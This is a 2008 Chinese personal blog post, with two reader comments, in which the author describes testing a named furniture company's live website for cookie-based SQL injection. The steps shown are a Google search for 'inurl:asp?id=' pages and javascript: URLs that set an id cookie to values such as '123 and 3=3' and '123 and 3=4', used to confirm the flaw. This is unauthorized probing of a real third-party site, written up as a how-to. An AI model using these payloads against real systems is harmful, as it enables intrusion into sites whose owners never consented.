汇编网首页登录博客注册
240420643的学习博客
博客首页博客互动【做检测题】论坛求助

我的博客

个人首页 |  我的文章 |  我的相册 |  我的好友 |  最新访客 |  文章收藏 |  论坛提问 |  友情链接 |  给我留言  
图片载入中
学习动态
好友圈
文章收藏

[2008-08-12 23:05] 康耐登家具网站有cookie注入漏洞!!!!(如果那篇文章严谨的话)

图片载入中
http://www.hf110.com/Article/hack/hcjs/200804/3704.html

为了实践这篇文章的内容,
1.我先在GOOGLE中搜索INURL:asp?id= 找到了康耐登家具网站,先去掉 ?ID=321 回车,发现网页不正常显示,
2.再输入javascript:alert(document.cookie="id="+escape("123")); 回车,按掉弹出的窗口,刷新,发现正常显示,说明用的是request("id")。
3.再输入javascript:alert(document.cookie="id="+escape("123 and 3=3")); ,回车,确定,刷新,发现能正常显示。
4.输入javascript:alert(document.cookie="id="+escape("123 and 3=4"));  ,回车,确定,刷新 ,发现网页不能正常显示。
javascript:alert(document.cookie="id="+escape("123 and 3=4"));
5.这就表明有漏洞了。
评论次数(2)  |  浏览次数(508)  |  类型(hack过程) |  收藏此文  | 

[  lxc345   发表于  2009-01-17 12:01  ]

光有人看没有人评论啊。我正在学习中,希望到时多指点啊,我已加你为好友了。嘿嘿不会瞧不起我这只菜鸟吧!

[  crazyman   发表于  2009-01-18 16:25  ]

俺不懂啊。
唉。

 
 请输入验证码  (提示:点击验证码输入框,以获取验证码